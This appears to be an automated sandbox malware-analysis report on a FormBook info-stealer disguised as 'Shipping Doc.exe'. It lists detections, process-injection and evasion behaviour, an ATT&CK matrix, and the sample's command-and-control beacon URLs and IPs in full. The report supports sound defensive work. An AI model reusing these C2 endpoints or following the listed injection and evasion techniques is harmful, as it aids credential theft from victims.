          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Timestomp1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 458885 Sample: Shipping Doc.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 5 other signatures 2->43 10 Shipping Doc.exe 3 2->10         started        process3 file4 27 C:\Users\user\...\Shipping Doc.exe.log, ASCII 10->27 dropped 13 Shipping Doc.exe 10->13         started        process5 signatures6 51 Modifies the context of a thread in another process (thread injection) 13->51 53 Maps a DLL or memory area into another process 13->53 55 Sample uses process hollowing technique 13->55 57 Queues an APC in another process (thread injection) 13->57 16 explorer.exe 13->16 injected process7 dnsIp8 29 www.bigdaddy.fish 208.113.204.236, 49742, 80 DREAMHOST-ASUS United States 16->29 31 www.davinescosmetics.com 16->31 33 davinescosmetics.com 34.102.136.180, 49744, 80 GOOGLEUS United States 16->33 35 System process connects to network (likely due to code injection or exploit) 16->35 20 cscript.exe 16->20         started        signatures9 process10 signatures11 45 Modifies the context of a thread in another process (thread injection) 20->45 47 Maps a DLL or memory area into another process 20->47 49 Tries to detect virtualization through RDTSC time measurements 20->49 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Shipping Doc.exe51%VirustotalBrowse
          Shipping Doc.exe37%MetadefenderBrowse
          Shipping Doc.exe26%ReversingLabsByteCode-MSIL.Spyware.Noon
          Shipping Doc.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.Shipping Doc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.jiyu-kobo.co.jp/argeg0%Avira URL Cloudsafe
          http://www.sajatypeworks.comiv0%URL Reputationsafe
          http://www.founder.com.cn/cnP0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/vam&0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/fr-f0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/siv0%URL Reputationsafe
          http://www.davinescosmetics.com/amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR0%Avira URL Cloudsafe
          http://www.fonts.comny0%Avira URL Cloudsafe
          http://www.tiro.comI0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.fontbureau.comcomFU0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/en-u0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.fontbureau.comalsdn0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/80%URL Reputationsafe
          http://www.fontbureau.comlicd0%Avira URL Cloudsafe
          http://www.founder.com.cn/cny0%URL Reputationsafe
          http://www.fonts.comicV0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/00%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.sakkal.comc0%Avira URL Cloudsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y0a0%Avira URL Cloudsafe
          http://www.sajatypeworks.coma70%Avira URL Cloudsafe
          http://www.founder.com.cn/cnd0%URL Reputationsafe
          http://www.bigdaddy.fish/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/U0%URL Reputationsafe
          www.shopjempress.com/amb6/0%Avira URL Cloudsafe
          http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/n0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/q0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnz0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/B0%URL Reputationsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/;0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
          http://www.founder.com.cn/cn80%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.founder.com.cn/cn40%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/d0%URL Reputationsafe
          http://www.founder.com.cn/cn&0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/en-ut0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.bigdaddy.fish
          		208.113.204.236
          		truetrue
            		unknown
            davinescosmetics.com
            		34.102.136.180
            		truefalse
              		unknown
              www.davinescosmetics.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.davinescosmetics.com/amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhRfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.bigdaddy.fish/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhRtrue
                • Avira URL Cloud: safe
                		unknown
                www.shopjempress.com/amb6/true
                • Avira URL Cloud: safe
                		low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.jiyu-kobo.co.jp/argegShipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.fontbureau.com/designersGexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                  		high
                  http://www.sajatypeworks.comivShipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cnPShipping Doc.exe, 00000002.00000003.216929499.0000000005786000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.com/designers/?explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                      		high
                      http://www.jiyu-kobo.co.jp/vam&Shipping Doc.exe, 00000002.00000003.218276730.0000000005785000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/fr-fShipping Doc.exe, 00000002.00000003.218167835.0000000005785000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.tiro.comexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/sivShipping Doc.exe, 00000002.00000003.218167835.0000000005785000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fonts.comnyShipping Doc.exe, 00000002.00000003.213474844.000000000579B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.tiro.comIShipping Doc.exe, 00000002.00000003.214716683.000000000579B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.goodfont.co.krexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.sajatypeworks.comShipping Doc.exe, 00000002.00000003.212987891.0000000005783000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.comcomFUShipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.typography.netDexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/staff/dennis.htmShipping Doc.exe, 00000002.00000003.222324750.0000000005792000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.jiyu-kobo.co.jp/en-uShipping Doc.exe, 00000002.00000003.218593004.0000000005785000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://fontfabrik.comexplorer.exe, 00000006.00000000.282249267.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.comalsdnShipping Doc.exe, 00000002.00000003.220043454.0000000005785000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
